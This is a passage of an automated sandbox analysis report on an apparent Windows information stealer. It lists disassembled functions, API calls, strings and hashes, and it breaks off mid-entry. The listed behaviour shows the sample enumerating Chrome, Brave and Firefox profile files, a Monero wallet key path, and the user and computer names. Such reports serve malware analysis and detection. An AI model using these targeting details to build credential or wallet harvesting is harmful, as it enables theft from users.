                            • Opcode Fuzzy Hash: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                            • Instruction Fuzzy Hash: B9E0E67094530CFBE7546BA09C0EF49767CFB05B05F104154F7097A5D0D6B52A419799
                            Function 006810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                            • Instruction ID: abb53f2ab95196be0a43ee9829758997e9f1d0599a284dfdcc2df8f5da75049d
                            • Opcode Fuzzy Hash: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                            • Instruction Fuzzy Hash: FBF0E271641208BBEB14ABA8AC49FAAB7ECE706B15F300548F504E7280D9729E00CBA4
                            Function 00681190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                              • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                              • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                            • ExitProcess.KERNEL32 ref: 006811C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                            • Instruction ID: 86063916dce87cf05e20b9b666490c98c209b118acc6fd5ea155ea3d57d60522
                            • Opcode Fuzzy Hash: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                            • Instruction Fuzzy Hash: 2CE0ECB592420956CE4473B0AD0AF2A32AE6B16749F040539BA05D6602FA25E801866E

                            Non-executed Functions

                            Function 006938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006938CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006938E3
                            • lstrcat.KERNEL32(?,?), ref: 00693935
                            • StrCmpCA.SHLWAPI(?,006A0F70), ref: 00693947
                            • StrCmpCA.SHLWAPI(?,006A0F74), ref: 0069395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00693C67
                            • FindClose.KERNEL32(000000FF), ref: 00693C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                            • Instruction ID: 9e8026a8da236e06e74ec0958f162d4e6fa059cd7c6249f7482866e4fd388306
                            • Opcode Fuzzy Hash: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                            • Instruction Fuzzy Hash: 5CA161B19002189FDF24EFA4DC85FEA737DFB54300F044588A60DA6641EB759B84CFA2
                            Function 0068BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2B,00000000,?,?,?,006A13F4,006A0B2A), ref: 0068BEF5
                            • StrCmpCA.SHLWAPI(?,006A13F8), ref: 0068BF4D
                            • StrCmpCA.SHLWAPI(?,006A13FC), ref: 0068BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0068C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                            • Instruction ID: bb528bd5f694eb06a99d664f57c8e545f037bc76af6a54cc0e6b57642ce28442
                            • Opcode Fuzzy Hash: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                            • Instruction Fuzzy Hash: 974252729101089BDF54FBF0DD96EED73BEAB44300F40465CB90AA6581EE349B49CBE6
                            Function 00694910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0069492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00694943
                            • StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                            • StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                            • FindClose.KERNEL32(000000FF), ref: 00694B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                            • Instruction ID: 78fc735b6ace992c67b08d689b94c499c69758d53faaadf73f85c9bc69124622
                            • Opcode Fuzzy Hash: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                            • Instruction Fuzzy Hash: E56144B1900218ABCB24EBA0DC49EEA73BDBB49704F04859CB549A6141EF75DB45CF91
                            Function 00694570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                            • wsprintfA.USER32 ref: 006945A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                            • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 006945EB
                            • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0069468B
                            • FindClose.KERNEL32(000000FF), ref: 006946A0
                            • lstrcat.KERNEL32(?,013AE320), ref: 006946C5
                            • lstrcat.KERNEL32(?,013AD2F8), ref: 006946D8
                            • lstrlen.KERNEL32(?), ref: 006946E5
                            • lstrlen.KERNEL32(?), ref: 006946F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                            • Instruction ID: c6b91625debfb2830a9a7990ccbcb1ccf4af48b1a25618ae5ece774eb695e75e
                            • Opcode Fuzzy Hash: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                            • Instruction Fuzzy Hash: 7F5153B190021CAFCB64EBB0DC89FE9737DBB58304F404598F64996190EF759B858FA2
                            Function 00693EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00693EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00693EDA
                            • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 00693F08
                            • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00693F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0069406C
                            • FindClose.KERNEL32(000000FF), ref: 00694081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                            • Instruction ID: 68bebdad48561e918c3516fb6c1c47a0b03ae3b0a3cd90fcae18f1bf441d0325
                            • Opcode Fuzzy Hash: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                            • Instruction Fuzzy Hash: ED5154B2900218AFCF24FBB0DC85EEA737DBB44304F00459CB65996140EB759B868F95
                            Function 0068ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0068ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0068ED55
                            • StrCmpCA.SHLWAPI(?,006A1538), ref: 0068EDAB
                            • StrCmpCA.SHLWAPI(?,006A153C), ref: 0068EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0068F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                            • Instruction ID: 7ec0505d578a628fd99a90c892ebf4b41794f6dc4735573eb5edc745c2fc6655
                            • Opcode Fuzzy Hash: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                            • Instruction Fuzzy Hash: 0AE1F4719211189ADF94FBA0CD52EEE737EAF54300F40419DB50A66492EF306F8ACF96
                            Function 0068F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                            • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                            • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                            • Instruction ID: 021593f021a61d71e557ff09b409c22fb31e927ab00fb4b9c7473a6f00cb5716
                            • Opcode Fuzzy Hash: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                            • Instruction Fuzzy Hash: BBB132719101189BDF64FBA0DD56AED73BEAF54300F4086ACA40A9A541EF306B49CFD6
                            Function 006816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A510C,?,?,?,006A51B4,?,?,00000000,?,00000000), ref: 00681923
                            • StrCmpCA.SHLWAPI(?,006A525C), ref: 00681973
                            • StrCmpCA.SHLWAPI(?,006A5304), ref: 00681989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00681DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E20
                            • FindClose.KERNEL32(000000FF), ref: 00681E32
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
